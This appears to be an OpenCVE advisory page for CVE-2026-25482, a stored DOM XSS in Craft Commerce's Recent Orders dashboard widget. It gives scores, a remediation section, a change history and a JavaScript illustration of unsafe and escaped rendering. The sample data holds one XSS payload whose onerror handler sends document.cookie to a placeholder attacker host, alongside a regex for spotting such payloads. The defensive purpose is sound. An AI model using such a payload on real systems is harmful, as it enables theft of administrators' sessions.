Description
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Published: 2026-02-03
Score: 6.2 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS
Action: Patch Now
AI Analysis

Impact

Craft Commerce versions 4.0.0‑RC1 to 4.10.0 and 5.0.0 to 5.5.1 contain a stored DOM-based cross‑site scripting flaw in the Recent Orders dashboard widget. The widget builds its markup by concatenating the Order Status Name into a JavaScript string without escaping it, so a status name containing HTML or script becomes live DOM in the browser of every administrator who views the dashboard. The injected code runs in the logged‑in admin's session and can therefore do anything that admin can do in the control panel, including stealing session or API tokens, capturing credentials and creating further privileged accounts.
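To make the mechanism concrete, the following is an added JavaScript illustration and not Craft Commerce's widget code: the order object shape, the row markup, the function names and the sample payload are all assumptions made for this demonstration. It shows the concatenation pattern that turns a stored status name into live markup, the escaped form of the same row that does not, and a small audit helper that flags stored status names worth inspecting after an upgrade.

```javascript
// Added illustration of the bug class in the Recent Orders widget (CWE-79 via
// JavaScript string concatenation). This is not Craft Commerce's code: the
// order/status shape, the row markup and the function names are assumptions.

const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the characters that let a value break out of an HTML text node or a
// quoted attribute value. Apply it at the point of concatenation, never earlier.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// Vulnerable pattern: server-supplied data is dropped straight into an HTML
// string that the widget later assigns to innerHTML (or jQuery .html()). Any
// markup in status.name becomes live DOM in the viewing admin's browser.
function renderRecentOrderRowUnsafe(order) {
  return '<tr>' +
    '<td>' + order.number + '</td>' +
    '<td><span class="status ' + order.status.handle + '">' +
      order.status.name + '</span></td>' +
    '</tr>';
}

// Hardened pattern: the same row, with every untrusted value escaped where it
// is concatenated. Text and attribute contexts are both covered because the
// escape set includes both quote characters.
function renderRecentOrderRowSafe(order) {
  return '<tr>' +
    '<td>' + escapeHtml(order.number) + '</td>' +
    '<td><span class="status ' + escapeHtml(order.status.handle) + '">' +
      escapeHtml(order.status.name) + '</span></td>' +
    '</tr>';
}

// Audit helper for the stored data: flag status names that contain anything
// HTML-active (tags, event-handler attributes, javascript: URLs). Coarse by
// design; it selects candidates for a human to look at, it does not sanitize.
const ACTIVE_CONTENT = /<|>|javascript:|\bon[a-z]+\s*=/i;

function findSuspiciousStatusNames(statusNames) {
  return statusNames.filter((name) => ACTIVE_CONTENT.test(String(name)));
}

// Constructed sample data for the demo; attacker.example is a placeholder host.
const SAMPLE_ORDER = {
  number: 'a1b2c3',
  status: {
    handle: 'processing',
    name: 'Processing<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  },
};
const SAMPLE_STATUS_NAMES = ['New', 'Processing', 'Shipped', SAMPLE_ORDER.status.name];

console.log('unsafe :', renderRecentOrderRowUnsafe(SAMPLE_ORDER));
console.log('safe   :', renderRecentOrderRowSafe(SAMPLE_ORDER));
console.log('flagged:', findSuspiciousStatusNames(SAMPLE_STATUS_NAMES));
```

In a real browser the cleaner fix is to build the row with document.createElement and assign the name through textContent, which never parses the value as HTML; escapeHtml is shown because it is the minimal change to a widget that already builds strings. The audit regex is a coarse filter for manual review, not a sanitizer.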

Affected Systems

The affected product is Craft Commerce, the ecommerce plugin for Craft CMS. All releases from 4.0.0‑RC1 up to and including 4.10.0, and from 5.0.0 up to and including 5.5.1, are vulnerable. Versions 4.10.1 and 5.5.2 contain the fix, as do later releases in each line.

Risk and Exploitability

The CVSS 4.0 base score of 6.2 (Medium) carries the vector AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N; NVD's CVSS 3.1 assessment is 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N). Both vectors describe the same shape: the attacker needs high privileges (an account that can edit Commerce order statuses) to store the payload, and the victim is a different administrator whose only interaction is viewing the dashboard. The changed scope in 3.1 and the high subsequent‑system impact in 4.0 reflect that the payload runs in the victim's browser session rather than the attacker's own. The EPSS estimate is below 1%, the flaw is not in the CISA KEV catalog, and the SSVC assessment records no known exploitation and rates it not automatable, so it is unlikely to be the target of mass exploitation. The practical risk is an insider or a compromised high‑privilege account using the dashboard to reach other administrators' sessions.

Generated by OpenCVE AI on April 18, 2026 at 00:14 UTC.

Remediation

Vendor fix: upgrade to Craft Commerce 4.10.1 (4.x line) or 5.5.2 (5.x line), the patched releases named in GHSA-frj9-9rwc-pw9j. No separate vendor workaround is listed.

OpenCVE Recommended Actions

  • Upgrade Craft Commerce to at least version 4.10.1 (4.x) or 5.5.2 (5.x), which contain the patch for this DOM XSS flaw.
  • Keep the ability to edit order statuses limited to trusted administrators, and audit existing Order Status Names for HTML tags, event‑handler attributes or javascript: URLs: the fix corrects how the widget renders the name, so a payload stored before the upgrade still has to be found and removed.
  • If the upgrade cannot be applied immediately, a Content‑Security‑Policy that disallows inline script on the control panel limits what an injected payload can do, but the Craft control panel itself depends on inline scripts, so test such a policy in staging before enabling it in production.

Generated by OpenCVE AI on April 18, 2026 at 00:14 UTC.

Tracking


Advisories
Source        ID                    Title
Github GHSA   GHSA-frj9-9rwc-pw9j   Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget)
History

Tue, 10 Feb 2026 18:15:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Craftcms craft Commerce
CPEs                                   cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
                                       cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*
                                       cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*
Vendors & Products                     Craftcms craft Commerce
Metrics                                cvssV3_1 {'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}


Wed, 04 Feb 2026 17:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 04 Feb 2026 12:15:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Craftcms
                                       Craftcms commerce
Vendors & Products                     Craftcms
                                       Craftcms commerce

Tue, 03 Feb 2026 18:30:00 +0000

Type          Values Removed   Values Added
Description                    Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Title                          Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget)
Weaknesses                     CWE-79
References
Metrics                        cvssV4_0 {'score': 6.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-04T16:51:24.031Z

Reserved: 2026-02-02T16:31:35.821Z

Link: CVE-2026-25482

Vulnrichment

Updated: 2026-02-04T15:46:24.947Z

NVD

Status : Analyzed

Published: 2026-02-03T19:16:25.563

Modified: 2026-02-10T18:13:27.020

Link: CVE-2026-25482

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T00:15:31Z

Weaknesses